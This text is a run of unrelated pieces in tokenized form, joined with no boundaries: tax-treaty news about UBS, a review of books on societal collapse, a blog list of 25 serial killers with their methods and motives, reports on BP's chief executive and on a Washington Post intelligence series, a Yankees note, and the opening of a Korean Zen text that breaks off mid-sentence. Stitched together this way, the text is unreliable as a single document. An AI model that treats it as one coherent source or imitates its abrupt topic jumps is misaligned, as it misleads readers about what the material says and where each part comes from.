“ Almost all of the remaining cases -- roughly 1,450 -- are already being processed , so efforts to comply with the treaty assistance request are on course . ”
The U.S. tax commissioner praised the action .
U.S. authorities had been talking tough , threatening to go back to court to get UBS to comply if the August deadline was missed .
“ We will immediately follow up on the information we receive from the Swiss , ” IRS Commissioner Doug Shulman said in a statement .
UBS paid a fine of $ 780 million and gave Washington the names of 250 to 300 U.S. clients as part of a deal to settle a criminal lawsuit last year .
The U.S. government has been pursuing criminal cases against some of those individuals .
UBS shares closed up 1.35 percent in Zurich .
RELIEF FOR SWISS BUSINESS
UBS welcomed Swiss parliamentarians ’ decision to back the deal .
“ It ( the approval ) means that our clients will trust us more , that they will be less worried about actions people have speculated about in recent days and weeks , ” UBS Chief Executive Oswald Gruebel told Swiss TV channel SF1 .
“ I do n’t think that there will be an immediate change in the bank business , ” he said .
UBS had given the data to Swiss tax authorities for processing , but a court in January prevented them from passing on the data , forcing the government to bypass the ruling with a legal patch that required parliamentary approval by both houses .
Switzerland ’s largest party , the right - wing Swiss People ’s Party ( SVP ) , shifted position at the 11th hour , allowing the lower house to back the deal without the referendum it had urged .
Approval of the tax treaty without the uncertainties posed by a popular vote was the best outcome for UBS and Switzerland , said Bob Ray of New York law firm Pryor Cashman .
“ Uncertainty in any market is the worst possible scenario , ” said Ray , a former assistant federal prosecutor .
Parliamentarians ’ backing of the treaty sent an important signal and prevented the restart of a legal battle that could have damaged the wider Swiss economy , business lobby group economiesuisse said .
“ Swiss business thanks parliament for the decision , which is in the interests of the whole nation and its economy , ” said economiesuisse President Gerold Buehrer .
Tainter makes this observation ; substantial increased costs occurred late , shortly before collapse and were incurred by a population already weakened by a pattern of declining marginal returns .
It was not a challenge that caused the collapse but a system that had been unproductively complex was unable to respond .
Tainter says that the only solution for over complexity is simplification but complex systems are unable to voluntarily simplify .
Collapse is nothing more than involuntary simplification .
The above is from my review of The Collapse of Complex Societies by Joseph A. Tainter .
At the forefront of those predicting the collapse of our civilization is James Howard Kunstler .
In a 2004 article Kunstler had this to say :
When the tipping point comes , Americans will be compelled to live very differently than they do today .
One leading American social critic , James Howard Kunstler , sees serious political and cultural turmoil up ahead as the way of life Americans have built over the last 60 years begins to break down .
With decreasing access to cheap oil , Kunstler sees the fundamentals of industrial agriculture , manufacturing and retail trade changing significantly .
“ The whole Archer Daniels Midland model of turning oil into corn into Taco Bell — that whole complex , that system , is really going to be over , ” says Kuntsler .
“ We ’re going to be forced to grow more of our food locally and return to a kind of agriculture that really has n’t been practiced here in a long time .
A lot of the land that has only had value as suburban development in the past 30 or 40 years is going to have to be reassigned . ”
Likewise , Kunstler foresees “ the demise of Wal - Mart style , big box , national chains . ”
Companies whose profit margins depend on “ merchandise made by factories 12,000 miles away ” simply wo n’t function in a world of $ 100 - plus barrels of oil .
“ We ’re going to have to seriously reorganize our whole system of retail trade and economy . ”
Kunstler expanded on this in his book The Long Emergency : Surviving the Converging Catastrophes of the Twenty - First Century .
But what might the collapse look like ?
To answer this question Kunstler turns to fiction , World Made by Hand
It is the summer of 2025 and the location is Washington County in upstate New York .
There has been a major war in the middle east .
Washington DC has been destroyed taking out the US Government and Los Angeles has been destroyed dealing a death blow to the US economy .
There is no government , no electricity , no oil , no automobiles , no newspapers or any other communication .
Millions have died and the ones that remain spend most of their time producing food .
The main character is Robert Earle , a former software salesman turned carpenter / handyman .
We also meet a minster and his wife , a group of thugs that work as scavengers , a large landowner who has a fiefdom complete with serfs and a charismatic religious cult leader .
This is all about a group of people trying to create a new civilization on top of the ruins of the old one with very little to work with .
Robert Earle is forced into a position of leadership he really does n’t want but he knows that someone has to do it .
The subjects are humans so there a good people and bad , many with a lot of ambition and many with just enough to survive .
There is love and murder , lawlessness and frontier style justice .
As depressing as it sounds there is always a thread of hope .
This novel may have a political message but even those who do n’t buy the message were forced to admit it is a well written story and a good read .
It is not what you would expect from an author known primarily for non fiction .
Kunstler manages to take us into the hearts and souls of the characters .
Even if you do n’t agree with the premise I would still recommend the book because it is simply a very good read .
I watch a lot of scary movies .
Vampires , werewolves , zombies … they ’ve got nothing on one other group when it comes to scaring me — serial killers .
Even when they ’re just fictional characters , I find serial killers to be terrifying not because I expect to come across one any more than a movie monster , but because they represent something real .
These awful excuses for human beings do exist , and they pose a real threat to society .
They come in all shapes and sizes , colors , and races .
Today we ’ll take a quick look at 25 serial killers from around the world .
There will be some of the more well - known U.S. and other serial killers , but we ’ll also have some from places like Russia , Indonesia , Mexico , China , and more .
They are n’t all the most famous serial killers .
You ’ve probably never heard of some of them .
And some of your “ favorites ” wo n’t be included here .
This list is a little different .
Rather than focusing solely on well - known serial killers ( although some will be included ) , we ’re looking at a more diverse group — both men and women , different races and nationalities , etc .
Even more importantly , I wanted to take a look at some of the world ’s recent and distant serial killers with some of the most disturbing motives or stories .
Keep in mind … .
I ’m not claiming these are THE most disturbing serial killers .
There have been too many for me to ever know about them all , and that would be subjective .
These are just some examples of particularly disturbing individuals that caught my attention or made me cringe .
If other serial killers top your own personal list , feel free to leave a comment below to tell us about them .
25 Disturbing Serial Killers from Around the World
The serial killers profiled below are listed in alphabetical order ( by first names ) — not in any order based on how “ disturbing ” I might find them , by race , nationality , etc .
Also , understand that the definition of “ serial killer ” is heavily debated .
For example some definitions simply state there must be a break between killings to separate serial killers from mass - murderers .
Other definitions give a specific length that break must be in order to qualify as a serial killer rather than a spree killer .
We ’re not going split hairs about that here .
Note :
Where legal images were available for re-publication , I ’ve included them below .
You can run a Google image search to view other serial killers from the list if you ’re interested — but having them appear in image search results does n’t give us the right to publish them here for you directly .
I did , however , try to link to one page with an image where possible when one was n’t available for republication .
Now , let ’s get to the list .
1. Ahmad Suradji
[ image ]
The idea of ritualistic serial killers on one hand baffles me and on the other hand fascinates me .
They ’re a reminder that the world is full of different cultures where different practices are considered acceptable than here in the West .
But Ahmad Suradji does n’t seem to be following any kind of cultural norm .
Instead he just sounds deranged .
At the same time , I have to admit it ’s one of the more “ interesting ” excuses or motives I ’ve ever seen .
Here ’s more on Indonesian serial killer , Ahmad Suradji .
Victims : Suradji murdered 42 females between the ages of 11 and 30 .
The killings took place over 11 years .
Kill Zone : Medan , Indonesia
Methods : Suradji buried his victims up to their waists and strangled them with a cable .
Motives : Suradji conducted ritual killings .
He claimed to be told by his father ’s ghost in a dream that by killing these women and drinking their saliva , he would become a mystic healer .
Outcome : Ahmad Suradji was found guilty on April 27 , 1998 of his crimes and was executed by firing squad on July 10 , 2008 .
Additional Information : One of Suradji ’s three wives ( Tumini ) was tried as an accomplice .
Often Suradji ’s victims were women who came to him seeking his services as a healer .
2. Aileen Wuornos
On one hand , I can understand that traumatic experiences can lead to disturbing behavior .
Still … .
Call me crazy , but I just ca n’t see trauma caused by someone else as justification for murdering others .
Then again , that ’s probably because I ’m not crazy .
Aileen Wuornos is the first female serial killer on our list here , and she ’s an example of someone who was ( or who claimed to be ) traumatized , leading to the murders of several men .
Victims : Wuornos killed 7 men between the ages of 40 and 65 .
Kill Zone : Florida , United States
Methods :
The murders were committed with multiple gun shots .
Motives : Wuornosclaimed that the men she killed had raped her ( or tried to ) while she was working as a prostitute .
Outcome : Wuornos was executed by lethal injection on October 9 , 2002 .
Additional Information : Aileen Wuornos ’ story was the basis for the movie Monster .
She had a child when she was a young teen , claiming she was raped by an unknown man .
However , it ’s suspected by some that her brother actually fathered the child .
3. Alexander Pichushkin
[ image ]
Alexander Pichushkin is a Russian serial killer known as “ The Chessboard Killer . ”
Unlike some killers who have almost understandable motives ( such as being abused or tortured themselves in some way — not that it excuses anything ) , Pichushkin is a whole different level of crazy .
He killed for the competition of it .
Victims : Pichushkin has 48 verified victims .
While not all , most of them were elderly homeless men .
Kill Zone : Moscow , Russia
Methods : Most of Alexander Pichushkin ’s victims were killed with hammer blows to the head .
He preferred to strike them from behind supposedly to avoid spilling blood on himself .
He then threw some of his victims into the sewers .
Motives :
It is believed Pichushkin considered himself to be in competition with another serial killer — Andrei Chikatilo .
At one point he mentioned that his “ goal ” was to kill 64 victims — enough to fill the squares on a chessboard , hence his nickname .
Outcome : Pichushkin was convicted on October 24 , 2007 to life in prison , including 15 years of solitary confinement .
Additional Information : Pichushkin has been quoted as saying “ For me , life without killing is like life without food for you … .
I felt like the father of all these people , since it was I who opened the door for them to another world .
” He was kept in a glass cage during his trial .
4. Andrei Chikatilo
[ images ]
You ’ve already seen the name Andrei Chikatilo mentioned , because he was at least partially the inspiration for another Russian serial killer — Alexander Pichushkin .
Chikatilo was known by two nicknames —
“ The Red Ripper ” and “ The Rostov Ripper . ”
Victims : Chikatilo killed 53 women and children ( of both genders ) .
Kill Zone : Rostov Oblast , Russia
Methods : Chikatilo did n’t kill all of his victims in the same way .
Most were stabbed , but a few were strangled or battered to death .
All were mutilated .
Motives : Chikatilo killed for sexual satisfaction — he could only become aroused by committing violent acts against women .
Outcome : Andrei Chikatilo was shot and executed on February 14 , 1994 .
Additional Information : Chikatilo was impotent due to a childhood illness , yet had two children of his own .
His son Yuri was charged with the attempted murder of a man .
5. Carl Eugene Watts
[ image ]
One thing I find particularly disturbing is when killers start young and no one “ notices ” or stops them before they can escalate .
According to Watts , he was one of those kinds of killers .
Victims : Watts killed females between the ages of 14 and 44 .
Twelve victims are confirmed , but it ’s expected that there were more — possibly dozens .
Kill Zone : Texas and Michigan , United States
Methods :
Watts was n’t faithful to any particular method of killing his victims .
He use strangulation , stabbing , drowning , and beatings .
Motives :
While his motives are n’t believed to be sexual in nature ( as with many serial killers ) , they are n’t known .
Outcome : Watts died of cancer on September 21 , 2007 shortly after being sentenced to life in prison .
Prior to this , he had been serving time in Texas .
Additional Information : Watts is believed to have had an IQ of just 68 , and he may have killed his first victim at the young age of 15 .
6. Carlton Gary
[ image ]
I wo n’t say that I do or do n’t believe Carlton Gary is guilty of being “ The Stocking Strangler . ”
But for all that we know , that ’s who he is .
Others disagree , and believe it ’s a case of poor evidence .
What do you think ?
Victims : Carlton Gary is believed to have killed 7 elderly women .
Kill Zone : Georgia , United States
Methods :
Victims were beaten , raped , and then strangled to death .
Outcome : Gary was convicted of murder on August 26 , 1986 and then sentenced to death .
He is still on death row .
He was supposed to be executed on December 16 , 2009 but the Georgia Supreme Court stopped his execution the day it was supposed to happen to allow for a hearing on the DNA evidence .
7. Dana Sue Gray
[ image ]
Have you ever seen an “ outfit to die for ? ”
Apparently serial killer / shopaholic Dana Sue Gray has .
This has got to be one of the most screwed up motives for murder I ’ve seen .
But really , greed is one of the oldest I guess .
Victims : Gray killed 3 elderly women age 57 – 87 , and a fourth victim survived .
Kill Zone : California , United States
Methods :
Two of the victims were strangled with telephone cords ( the survivor was one of them ) , one was beaten , and one was stabbed .
Motives : Gray ’s motives were financial .
She said she killed her victims to support her overwhelming need to shop .
She stole cash and credit cards from her victims to help support her lifestyle .
Outcome : Gray was convicted and sentenced to life without parole on October 16 , 1998 .
8. Dean Arnold Corll
[ image ]
Child molester / serial killer , Dean Arnold Corll — known as “ The Candy Man ” — received a fate rather deserved ( at least in this writer ’s eyes ) .
I wo n’t even share what I think should be done to people who abuse and kill children .
This is the kind of killer nightmares are made of .
Victims :
He killed 27 or 28 young boys .
Kill Zone : Texas , United States
Methods : Victims wereraped / sexually assaulted , tortured , and then strangled or shot .
Outcome :
He was killed by one of his accomplices .
Additional Information : Hehad two accomplices who found his victims for him — for $ 200 each .
Apparently that ’s the price of a little boy ’s life .
9. Elizabeth Báthory
Now let ’s take a look at one of the worst female serial killers known , even if a few centuries too late — the “ Blood Countess ” Elizabeth Báthory .
Victims :
Although she was never personally tried , hundreds of female accomplices were convicted for 80 murders .
Kill Zone : Kingdom of Hungary
Methods :
Victims were treated to torture , mutilation , and beatings .
Outcome : The accomplices of Elizabeth Báthory were executed .
She , on the other hand , wasbricked into rooms of her castle for house arrest .
She was found dead on August 21 , 1614 .
Additional Information : Legend has it that she killed and then bathed in the blood of virgins to try to maintain her youth .
10 . Gary Leon Ridgway
[ image ]
Gary Leon Ridgway — “ The Green River Killer ” — makes my list of one of the most disturbing serial killers for the sheer volume of victims he had .
It ’s a reminder that sometimes awful people really can evade the law for quite some time .
And that is something I find terrifying .
Victims : Ridgway was convicted of 48 murders , although he confessed to killing 71 women .
He generally killed prostitutes that he would pick up and have sex with before committing the murders .
Kill Zone : Washington , United States
Methods : Strangulation
Outcome : Ridgway pled guilty to 48 counts of murder on November 5 , 2003 .
He was then sentenced to life in prison without parole .
Additional Information : Ridgway is said to have an IQ of 82 .
11 . Gregorio Cárdenas Hernández
[ image ]
When I think of violence in Mexico , I tend to think about drug - related instances and deaths — not serial killers .
But I guess we all have our “ outstanding citizens ” do n’t we ?
Gregorio Cárdenas Hernández — also known as the “ Strangler of Tacuba ” — did n’t have a lot of victims .
But what he did with them is disturbingly strange .
Victims : Cárdenas Hernández killed 3 teenage girls — two 16 - year - old prostitutes and one 19 - year - old student .
Kill Zone : Mexico City , Mexico
Methods :
After having sex with his victims , he strangled them and buried their bodies in his garden .
Outcome :
He was arrested and given a life sentence in 1942 , but escaped from prison in 1947 .
After being re-arrested he stayed in prison until 1976 when he was pardoned , cited as a great example of rehabilitation .
He died in 1999 , of natural causes .
Additional Information :
He studied law and psychiatry while in prison , and practiced law after his release .
He also wrote three books .
12 . Huang Yong
[ image ]
Apparently “ because I wanted to ” is a good enough motive to become a serial killer for some .
I do n’t know about you , but in my mind that ’s even worse than killing people for their money because you like to spend too much .
Victims :
Yong killed at least 17 teenage boys ( but based on a survivor ’s account , it was 25 ) .
Kill Zone : Henan province , China
Methods :
He drugged , rapes , and then suffocated his victims .
Motives : Huang
Yong was quoted as saying “ I ’ve always wanted to be an assassin since I was a kid , but I never had the chance . ”
Outcome :
He was both sentenced to death and then executed by firing squad December 2003 — apparently the Chinese do n’t wait around .
And in this case and the admission , really , I ca n’t say I blame them .
Additional Information : Yong was a migrant laborer , and he kept his victim ’s belts as souvenirs .
He claimed that killing females would n’t make him as much of a “ hero ” as killing males .
13 . Jack the Ripper
Jack the Ripper might be famous , but he ’s still relatively unknown .
His identity has never been discovered .
In fact , the murders attributed to him might not have even been committed by the same person .
But Jack the Ripper makes my list of some of the most disturbing serial killers in the world because , real or not , the lore surrounding those Whitechapel killings went a long way towards solidifying the image of the sinister serial killer in many of our minds — an image that might even be dangerous , given the socially charming nature of others .
Victims : Jack the Ripper was believed to have killed at least 5 prostitutes from 1888 - 1891 .
Kill Zone : London , England ( Whitechapel District )
Methods : Victims ’ throats were slit and their abdomens were mutilated .
Additional Information : A letter supposedly sent to the media from the killer ignited a media frenzy around the image of Jack the Ripper .
14 . Jeffrey Dahmer
[ image ]
Yes , Jeffrey Dahmer is another one of the more famous serial killers , but I did n’t promise to leave them all off .
Let ’s just say there was precious little Dahmer did that did n’t make him disturbing enough for this list .
Eating your victims is more than enough for me .
Victims : Dahmer killed 17 young men and boys .
His victims were of Asian or African descent .
Kill Zone : Wisconsin , United States
Methods : Dahmer was guilty of rape , torture , necrophilia , and cannibalism .
Outcome : Jeffrey Dahmer was sentenced to 15 terms of life in prison in 1992 , and he was killed by a fellow inmate on November 28 , 1994 .
Additional Information : Apparently on May 27 , 1991 , a 14 year old victim got away .
But when he went to police and Dahmer claimed he was his 19 year old boyfriend , police returned the boy to the killer .
The boy was murdered that night .
15 . Luis Garavito
[ image ]
“ La Bestia , ” Luis Garavito , is one of the most prolific serial killers on our list .
He ’s another one who preyed on young boys , making him doubly disgusting — both for his choice in victims and the number of people he killed .
Victims :
There are at least 138 confirmed victims of Luis Garavito — young boys .
Kill Zone :
He committed his murders across 59 counties in Colombia .
Methods : Victims were raped , had their throats slit , and were then dismembered .
Outcome : Garavito was convicted on April 22 , 1999 , and is serving the maximum sentence available in Colombia .
Although that sentence is only 30 years , he could still possibly be tried for other crimes he was n’t yet convicted for , keeping him in longer .
That said , there ’s also the possibility he could be released early .
16 . Mary Ann Cotton
Mary Ann Cotton is a prime example of the “ black widow ” type of female serial killer .
She tended to kill husbands , lovers , or those in her way .
Well , you know what they say about a “ woman scorned ” — or in this case just a woman who wants something from you .
Victims : Cotton had 21 victims including husbands , lovers , and “ competitors ” ( other women who were involved with her male victims ) .
Kill Zone : Durham , England
Methods : Cotton poisoned her victims .
Motives :
She killed her victims for two reasons : financial security ( collecting on life insurance policies ) and jealousy .
Outcome : Cotton was hanged in March 1873 .
Additional Information :
At the time it was assumed many of her victims died of “ gastric fever ” rather than poison .
17 . Moses Sithole
[ image ]
Moses Sithole is a South African serial killer .
What makes him most disturbing is n’t even how he killed his victims , but rather the fact that he would call and taunt his victims ’ families .
Victims : Sithole killed 30 or more women before he was tried .
Kill Zone : Johannesburg , South Africa
Methods : Victims were raped and strangled .
Outcome :
He was convicted on December 5 , 1997 and sentenced to 2410 years in prison .
He will be eligible for parole after 930 years — 2927 .
That ’s an oddly comforting , if not almost amusing , thought .
Additional Information : Sithole is believed to have posed as a businessman offering jobs in order to gain the trust of the women he murdered .
18 . Peter Kürten
When you think of vampires , what era do you think of ?
I certainly do n’t think of the 1900s … unless we ’re talking about movies .
But around 1930 the world met serial killer Peter Kürten , labeled the “ Vampire of Düsseldorf . ”
Victims :
While he was only charged with 9 murders and 7 attempted murders , Kürten actually confessed to 79 killings .
Kill Zone : Düsseldorf , Germany
Methods :
He intentionally chose to use a variety of killing methods to keep police in the dark about the connection between the murders .
Motives :
His motive was of the good old “ ca n’t get it up ” variety .
He killed for sexual stimulation , needing to see blood to become aroused .
Outcome : I ’m sure he would have been pleased by the blood on display July 2 , 1931 when he was executed by guillotine .
Additional Information : Kürten claimed that he committed his first murders when he was just 5 years old , drowning two friends .
19 . Robert Hansen
[ image ]
Robert Hansen took advantage of the Alaskan wilderness when he killed his victims .
All in all he is n’t much different than other serial killers .
What caught my attention about Hansen was his seeming addiction to “ the hunt ” — and I do n’t just mean finding new victims .
Victims : Hansen is believed to have killed somewhere between 17 and 21 young women , with a particular emphasis on prostitutes .
Kill Zone : Alaska , United States
Methods : Hansen ’s victims were kidnapped , raped , then released .
Hansen would then hunt his victims around his cabins like hunting game , and they were ultimately killed with a hunting knife or a rifle .
Outcome : Hansen pled guilty to 4 of the murders , and has served in various federal prisons since June 13 , 1983 .
Additional Information : Hansen took jewelry from his victims .
20 . Robert Maudsley
[ image ]
Robert Maudsley — “ Hannibal the Cannibal ” — makes the list not only for the belief that he ate part of the brain of one of his victims , but because of the types of people he killed .
Victims : Maudsley had 4 victims , but 3 of them were murdered while they were in prison .
Kill Zone : Berkshire , England
Methods :
One victim was killed by strangulation , another by torture , and two others by stabbings .
Outcome : Maudsley initially went to prison in 1974 .
But after killing 3 fellow prisoners he was placed in solitary confinement in 1983 .
Additional Information :
Three of Maudsley ’s 4 victims were actually child molesters or sex offenders .
Honestly that makes me dislike him just a wee bit less .
21 . Robert Pickton
[ image ]
Here ’s another killer who did n’t make this list because of how he killed his victims , but rather for something he did with their bodies after the fact .
Robert Pickton fed the bodies of his victims to pigs .
Yeah .
Victims : Pickton was convicted of killing 6 people , but charged with the murders of 20 others .
He murdered prostitutes .
Kill Zone : Vancouver , Canada
Methods : Pickton killed his victims by strangling and mutilation .
Details are largely unknown about victims he was n’t convicted on , but there were also possibly gunshot victims .
Outcome : His conviction on 6 counts of second degree murder happened on December 9 , 2007 .
He ’s serving a life sentence with no possibility of parole for 25 years .
Additional Information : Robert Pickton ’s story was loosely used in an episode of TV’s CSI and also served as the basis for an episode of Criminal Minds .
22 . Saeed Hanaei
[ image ]
I do n’t know which is worse … killing people because you are morally depraved , or killing people because you think you ’re cleansing that depravity or corruption .
Apparently Iranian serial killer Saeed Hanaei — the “ Spider Killer ” — had no problem with the latter .
Victims : Hanaei killed 16 prostitutes , with an emphasis on prostitutes who were drug addicts .
Kill Zone : Mashad , Iran
Methods : Hanaei strangled his victims .
Motives :
He killed his victims because he believed he was eliminating their moral corruption .
Outcome : Saeed Hanaei was hanged on April 8 , 2002 .
Additional Information : Hanaei was called the “ spider killer ” because he lured women to his home before having sex with and murdering them , similar to the way a spider lures prey into its web .
Hanaei was a high profile and controversial figure in Iran .
Some fundamentalists even praised his actions ( although I ca n’t quite see how sleeping with prostitutes before killing them is any kind of moral high ground — but hey , that ’s just me ) .
Hanaei ’s murders were the inspiration behind Alice Cooper ’s 2008 “ Along Came a Spider . ”
23 . Ted Bundy
Okay .
So Ted Bundy is another pretty well - known serial killer .
But cutting off and keeping the heads of victims definitely puts him in my list of seriously disturbing serial killers .
Victims : Bundy confessed to over 30 murders of white middle - class females between the ages of 15 and 25 .
Kill Zone : Washington , Oregon , Utah , Idaho , Colorado , and Florida , United States
Methods : Bundy ’s victims were beaten then strangled .
He was also guilty of rape and necrophilia .
Outcome : Bundy faced execution by the electric chair in Florida on January 24 , 1989 .
Additional Information : Bundy tended to kill women that resembled his fiancé and had similar hair styles .
But because they were physically different in other ways , Bundy denied a resentment towards here was part of his motive .
24 . Tsutomu Miyazaki
[ image ]
Well , when someone ’s known by names like the “ Little Girl Murderer ” and “ Dracula , ” it just ca n’t be good .
I ’m guessing the “ Dracula ” title would be a hint that Tsutomu Miyazaki drank blood from his victims .
But here ’s the even more disturbing part .
( And yes … it gets more disturbing than drinking the blood of little girls . )
He was also known to have eaten hands of a victim .
Oh , and just for good measure , he went out of his way to torment his victims ’ families .
I literally can’t read about this man without feeling physically ill .
Victims : Miyazaki killed 4 little girls between 4 and 7 years old .
Kill Zone : Tokyo , Japan
Methods : Bodies were mutilated and corpses were molested .
Outcome : Miyazaki was sentenced to death April 14 , 1997 and hanged June 17 , 2008 .
Additional Information : Miyazaki was born with deformed hands fused directly to his wrists , and contacted family members of victims with cryptic , taunting messages ( and even the cremated remains of one victim ) .
At one point , anime and horror films were cited as the reason for his crimes .
25 . Zodiac Killer
What can I say ?
I find unknown serial killers to be rather disturbing .
Are they still out there ?
I do n’t know .
But that ’s why the well - known Zodiac Killer makes my list .
The thought that these monsters could evade arrest gives me the willies .
Victims : The Zodiac Killer has 7 confirmed victims ( 5 dead and 2 survivors ) .
However some believe the killer has as many as 37 victims .
Kill Zone : California , United States
Methods : Victims were killed via stabbings and shootings .
Various cases were linked because of the Zodiac letters sent to newspapers .
The letters included strange symbols and ciphers , some of which are still unsolved .
They also included lines such as “ Me=37 , SFPD=0 , ” announcing 37 victims for the killer and no points for the police .
The letters date from August 1969 to 1974 ( last confirmed ) .
Motives :
One deciphered code claimed the thrill of killing was a motive , as well as talking about the victims serving as his slaves in the afterlife .
Additional Information : Dirty Harry is loosely based on these crimes , among other films like 2007 ’s Zodiac .
Given that this is a blog post and not a book , it would be absolutely impossible to share details about all of the world ’s serial killers .
These are some of the ones who jumped out at me and disgusted , intrigued , or disturbed me in some way — at least a bit moreso than the others .
What about you ?
Is there a local or historical serial killer you ’re aware of that has a disturbing story , methods , or motives ?
Feel free to share that information with the rest of us by leaving a comment .
Image caption Mr Hayward has been with the company for 28 years
BP 's chief executive Tony Hayward has been negotiating the terms of his exit , with a formal announcement likely within 24 hours , the BBC has learned .
Mr Hayward has been widely criticised over the Gulf of Mexico oil spill .
An official statement issued by BP in response said he had the " full support of the board and senior management " .
BBC business editor Robert Peston says Mr Hayward is likely to be replaced by his American colleague , Bob Dudley , who is in charge of the clean - up operation .
While BP has been preparing for a change at the top for some time , the company was waiting until progress had been made on stemming the leak and until it was possible to quantify the financial costs of the disaster , our correspondent adds .
BP is due to release its results for the second quarter on Tuesday .
It is expected to reveal a provision of up to $ 30 bn ( £ 19bn ) for the costs of the clean - up , compensation claims and fines to be paid , resulting in a massive quarterly loss .
It has also lost 40 % of its market capitalisation .
BP 's board is scheduled to meet on Monday ahead of the results , when it is expected to discuss the timing of Mr Hayward 's exit .
The official overseeing the US government response to the oil spill has meanwhile said the operation to plug the ruptured Macondo well permanently has been put back to allow more time for preparatory work .
Retired Coast Guard admiral Thad Allen said the last bit of pipe needed for the process would be put in place in the coming this week , with the actual plugging operation starting in the first week of August .
A temporary cap has stopped oil from gushing for more than a week .
Gaffes
Mr Hayward has been with BP for 28 years .
When he became chief executive in 2007 , he told journalists his number - one task was to focus " laser - like " on safety and reliability .
Peston 's Picks
If the moment has more or less arrived for BP to start building a post - Macondo future , then it also needs a new public face , a new leader Robert Peston , BBC business editor Hayward negotiates his exit
But the explosion on the drilling rig off Louisiana on 20 April , which killed 11 workers and triggered the worst oil spill in US history , has raised questions about his leadership .
The 53 - year - old has been heavily criticised by residents of the Gulf coast and US politicians for his handling of the clean - up operation and for a series of gaffes , including saying that he " just wanted his life back " and that the Gulf is a " big ocean " following the leak .
He was also taken to task for attending a sailing event off the Isle of Wight in June .
Mr Hayward was also publicly rebuked by members of the House Energy and Commerce Committee last month for " stonewalling " questions at a congressional hearing and of " kicking the can down the road " .
Responding to reports that Mr Hayward was expected to step down , US Congressman Ed Markey - who chairs a committee covering the oil spill issue - said : " While it 's now happy sailing for Tony Hayward , rough conditions will persist in the Gulf of Mexico for years to come because of his failed leadership .
" The new leaders of BP will have an uphill climb to correct the legacy [ he ] left , " he added .
Reputations
The man expected to replace Mr Hayward , BP Managing Director Bob Dudley , took over the day - to - day operations in the Gulf last month .
Image caption Many commentators believe Mr Dudley 's American accent will be advantageous from a PR perspective
Many say that , from a public relations point of view , Mr Dudley has the advantage of being American and speaking with an American accent .
He grew up in Mississippi and , according to BP , has a " deep appreciation and affinity for the Gulf Coast " .
Mr Dudley joined BP in 1999 following a merger with Amoco and rose to the board last year .
He is probably best - known for running BP 's joint venture in Russia , TNK - BP , during the public falling - out with its Russian partners .
Dr Richard Pike , chief executive of the Royal Society of Chemistry , said that perception was the key reason behind the change .
" If your major shareholders are getting the impression that there is a major problem here then that is key over and above anything the chief executive or his board of directors has done , " he told the BBC .
" In many ways changing the chief executive is as much practical as it is symbolic ; it all rests on reputation . "
Washington ’s intelligence establishment appears to be in panic mode over an upcoming Washington Post series about runaway growth in defense and intelligence spending .
A State Department email has accused the Post of planning to make public “ top secret ” information about defense and intelligence contractors working for the US , despite an admission in the same email that the Post ‘s information came from “ open sources . ”
ADVERTISEMENT
The series , by Pulitzer Prize - winning reporter Dana Priest , will include a TV partnership with PBS ’s Frontline and is expected to consist of three articles and an online database of military and intelligence contractors and their projects .
It ’s that database of contractors that seems to be worrying Washington the most .
Josh Rogin at Foreign Policy reports that the State Department sent out an email Thursday warning all 14,574 Washington - area employees of the upcoming reports .
“ On Monday July 19 , the Washington Post plans to publish a website listing all agencies and contractors believed to conduct Top Secret work on behalf of the US Government , ” the email stated .
“ The website provides a graphic representation pinpointing the location of firms conducting Top Secret work , describing the type of work they perform , and identifying many facilities where such work is done . ”
However , the extent to which the Post ‘s information will be “ top secret ” is debatable .
The State Department email goes on to say that the information the Post has gathered came from “ open sources , ” suggesting the information published in the Post ‘s database is already publicly available .
The email also tells employees they must “ neither confirm nor deny ” the claims made in the Post articles .
ADVERTISEMENT
That line is echoed in a letter to “ industry partners ” from the Office of the Director of National Intelligence .
In a blog posting entitled “ Is Wash Post Harming Intelligence Work ? ” , the Washington Times reprints the letter from the ODNI , which asks contractors to “ remind all cleared employees of their responsibility to protect classified information and relationships . ”
Marc Ambinder at the Atlantic has obtained a memorandum from the ODNI ’s communications chief , Art House , in which House lays out what he expects to see in the Post series , and his predictions paint a negative picture of defense and intelligence spending over the past decade .
House said while he “ ca n’t predict the content ” of the piece , he expects it will draw several conclusions :
The intelligence enterprise has undergone exponential growth and has become unmanageable with overlapping authorities and a heavily outsourced contractor workforce .
The IC and the DoD have wasted significant time and resources , especially in the areas of counterterrorism and counterintelligence .
The intelligence enterprise has taken its eyes off its post - 9/11 mission and is spending its energy on competitive and redundant programs .
ADVERTISEMENT
House also lays out a strategy for an expected public - relations battle after the series ’ publication :
It might be helpful as you prepare for publication to draw up a list of accomplishments and examples of success to offer in response to inquiries to balance the coverage and add points that deserve to be mentioned .
In media discussions , we will seek to garner support for the Intelligence Community and its members by offering examples of agile , integrated activity that has enhanced performance .
We will want to minimize damage caused by unauthorized disclosure of sensitive and classified information .
ADVERTISEMENT
And Foreign Policy ‘s Rogin reports that the Obama administration is already refuting the Post series , even though it wo n’t launch until Monday .
“ A lot of this is explainable , ” an unnamed administration official told Rogin .
“ You want some redundancy in the intelligence community and you ’re going to have some waste .
These are things we ’ve been aware of and in some instances we agree are troubling .
However , it ’s something we ’ve been working on for a year and a half .
It ’s something we ’ve been on top of . ”
The official went on to say that “ there will be examples of money being wasted in the series that seem egregious and we are just as offended as the readers by those examples . ”
NEW YORK --
The Yankees were n't at Bob Sheppard 's funeral , and according to team captain Derek Jeter some did n't even know when the event was taking place .
" To be quite honest with you , I did n't even know his funeral was yesterday , '' Jeter said on Friday .
" Having said that , I do n't necessarily think you have to go to a funeral to honor someone .
I think a lot of players have honored him .
It 's the reason why I 've recorded his voice throughout the years , and I 'll continue to honor him every time I go to the plate for the rest of my career .
But I was not aware of it and I do n't know how many of the players were aware of it . ''
Earlier Friday , reports that a bus carrying Yankees players to the funeral got stuck in traffic due to a fatal accident on a Long Island highway were deemed false , according to a team spokesman .
Inspiring Yourself to Practice
By the Korean Zen Master Wonhyo
This English translation and introduction were done by Won-myong Sunim and Mark Mueller
Inspiring Yourself to Practice was written by the Silla Monk Wonhyo ( 617-686 ) .
It consists of 706 characters , contained in one roll .
In Korea , the text is one of the most important in the curriculum of the temple training .
The text stresses the need to dissolve one ’s worldly attachments and habits , and to begin immediately to practice .
The original Chinese text is kept at Haein Temple , near Daegu , and the annotated version is kept at Songgwang Temple , in Sunchon .
All the Buddhas
who reside within the splendid realm of Nirvana
have , throughout countless eons ,
discarded their desires and undergone arduous training .
Sentient beings ,
transmigrating within
the burning house of desire
have , for countless generations ,
failed to discard their greed and desire .
The gates to heaven ( the Pure Land )
are not blocked ;
yet , few are those who enter them .
This is because most people make their home
